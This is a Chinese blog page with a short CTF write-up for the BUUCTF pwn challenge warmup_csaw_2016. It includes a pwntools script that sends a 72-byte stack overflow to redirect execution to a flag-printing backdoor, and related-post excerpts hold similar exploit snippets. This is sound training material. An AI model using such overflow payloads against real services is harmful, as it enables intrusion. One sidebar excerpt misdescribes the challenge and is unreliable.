buuctf warmup_csaw_2016

最新推荐文章于 2025-03-14 16:35:47 发布

kids-syc

最新推荐文章于 2025-03-14 16:35:47 发布

阅读量251

点赞数 1

文章标签：网络安全计算机网络

本文链接：https://blog.youkuaiyun.com/m0_74125780/article/details/141565813

版权

首先用checksec检查一下，发现是64bit，然后也没有什么保护，是比较基础简单的题目。

放入ida查看，发现有system函数，并且可以直接打开flag，所以我们找到它的地址。0x40060D。

然后又看到main函数里面有gets(v5),v5是分配了64个位置，然后这是64所以64+8。

写脚本

from pwn import *
p = remote('node5.buuoj.cn', 25097)
p.sendline(b'a' * 72 + p64(0x40060D))
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

kids-syc

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BUUCTF|warmup_csaw_2016 1

cm_zl

04-30

1356

from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()

【BUUCTF - PWN】warmup_csaw_2016

古月浪子的博客

03-19

3366

checksec一下，发现啥保护也没开 IDA打开看看，又是明显的栈溢出漏洞，看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...

参与评论您还未登录，请先登录后发表或查看评论

【BUUCTF】warmup_csaw_2016

2201_75556700的博客

11-29

454

4、这里有两个数组都是64字节，在sprintf这里，将sub_40060D函数的地址存放在s中。题目一：【BUUCTF】warmup_csaw_2016。3、使用ida64分析文件，找到main函数，F5反汇编。2、下载附件，在kali中分析，64位，小端存储。5、查看函数sub_40060D，地址。03、权限不够时，添加权限就可以。04、使用r命令运行程序。05、使用n命令单步调试。01、使用gdb工具。

buuctf 之warmup_csaw_2016

weixin_54452942的博客

03-25

535

发现了一个gets函数可以溢出，并且在上面的运行中，我们看到他输出了一个地址，在下面的sprintf函数中将一个函数的地址输出了，我们去看看这个函数是干什么的。一种是ida直接看（不一定准），40h是64字节，再加8字节的rbp就是ret的位置。这里的返回地址，也就是rbp下面的地址是df28，我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址，或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。

BUUctf warmup_csaw_2016

最新发布

A_fish_like_sing的博客

03-14

348

buu ctf pwn warmup_csaw_2016

BUUCTF-warmup_csaw_2016

m0_64180167的博客

04-11

479

64位的linux文件。

BUUCTF warmup_csaw_2016

m0_54262894的博客

08-20

402

BUUCTF warmup_csaw_2016 下载文件，把它拖入虚拟机中先checksec一下这是一个64位的文件，并且没有开启任何的保护我们先运行一下试试发现它给出了一个地址，我们先记下，可能会用到放入64位IDA中查看一下他的代码伪C代码↓ 汇编代码↓ 发现了一个函数sprintf，并且用%p的方式来输出，也就是输出地址下面是我搜索到的信息我们双击40060D看一下再回过头来看代码众所周知gets函.

buuctf warmup

01-13

对于warmup_csaw_2016这类涉及栈溢出覆盖返回地址的题目[^3]，解决方法主要依赖于理解程序内存布局以及如何利用缓冲区溢出来控制程序流。 #### 利用栈溢出漏洞获取Flag 针对此类问题的一个常见策略是通过精心构建...

BUUCTF-PWN刷题日记(一)

weixin_45461609的博客

04-30

1563

BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...

BUUCTF pwn前三道

2301_80470992的博客

12-21

1102

gets_s（buffer,size）函数：从标准输入中读取数据，size表示的最多读取的数量，在这里是argv，没有定义是多大，所以我们就可以无限的输入。但是可以发现buffer就只有0xF字节的大小，输入超过0xF个字节以后，你就会溢出，你会覆盖返回地址。代码分析：俩个write函数输出，然后sprintf函数利用%p将sub_40060函数地址（其实就是system函数）打印出来放到s里面，然后由write函数打印出来，由于是64位所以write那是9，存在溢出条件，接下来就是要找后门函数地址了。

buuctf|warmup_csaw_2016 1

m0_64236521的博客

04-15

1655

buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下，是64位文件拉进ida，发现gets(v5),查看v5,明显的栈溢出找到system，地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...

BUUCTF pwn——warmup_csaw_2016

CNS-Enterprise BCC-1701-J

03-11

182

BUUCTF 做题练习

[每日一PWN]BUUCTF warmup_csaw_2016

qq_55233040的博客

11-20

547

和第一题RIP一样，是经典而基础的ret2text。

[BUUCTF-PWN] warmup_csaw_2016

m0_46098032的博客

01-03

416

下载文件，checksec看一下，保护都没开，64位文件。用IDA64打开文件，查看一下main函数。可以看到明显的栈溢出漏洞（gets）。看一下v5，v5大小是 0x40, 返回地址是8 字节，溢出大小就是0x48。 sub_40060D有点可疑，双击看一下。发现这里就是system函数，我们在构造pyaload的时候加上sub_40060D。 exp为： from pwn import * p = remote('node4.buuoj.cn', 2574...

[BUUCTF-pwn]——warmup_csaw_2016

Y_peak的博客

01-30

5202

BUUCTF——warmup_csaw_2016 题目地址：https://buuoj.cn/challenges 题目：管他三七二十一，先将文件下载下来再说。老规矩，现在Linux上用checksec看看文件。64位，Stack、NX、PIE都没有开，应该是栈溢出的题。赶快 go go go 去window 上用IDA反汇编看看，看到返回的是gets函数，一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。按Shift + F12，看一下字符串。不看不知道一看有惊喜。cat flag.

PWN学习记录（3）BUUCTF-warmup_csaw_2016

m0_58824086的博客

08-01

569

由**char v5[64]**可得，在main函数的栈帧中，划分了一个64字节的存储空间，也就是说只需要存入64个字节地址，就可以get函数返回地址。下载题目得到 warmup_csaw_2016，利用 file 命令查看该文件的类型，再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看，打开字符串窗口。可得该文件是64位且该题任何保护都没有打开，所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中，Esc+:wq保存并退出1.py。

初学pwn-BUUCTF(warmup_csaw_2016)

天柱的博客

08-31

398

初学pwn-writeUp BUUCTF的第三道题，warmup_csaw_2016。首先链接远端，发现这里输出了一个十六进制的数字，就没有了后续。我们下载文件，持用ida打开查看。可以看到主函数这里上边全部都是输出，只有最后return的时候，有一个get命令，给v5这个数组进行赋值。从这里可以发信啊，刚刚输出的一个地址，是sub40060D这个函数的地址。点进去看一下。哦吼，cat flag.txt，那没毛病了，只需要在主函数的get这产生栈溢出，覆盖掉返回的值，就可以执行这个函数，获取f

warmup_csaw_2016 1

03-16

这是一道CSAW 2016年的预热题目，需要我们在给定的字符串中找到所有的数字，并将它们相加起来。具体的做法是，我们可以遍历字符串中的每一个字符，判断它是否是数字，如果是数字就将它转换成整数并加到总和中。...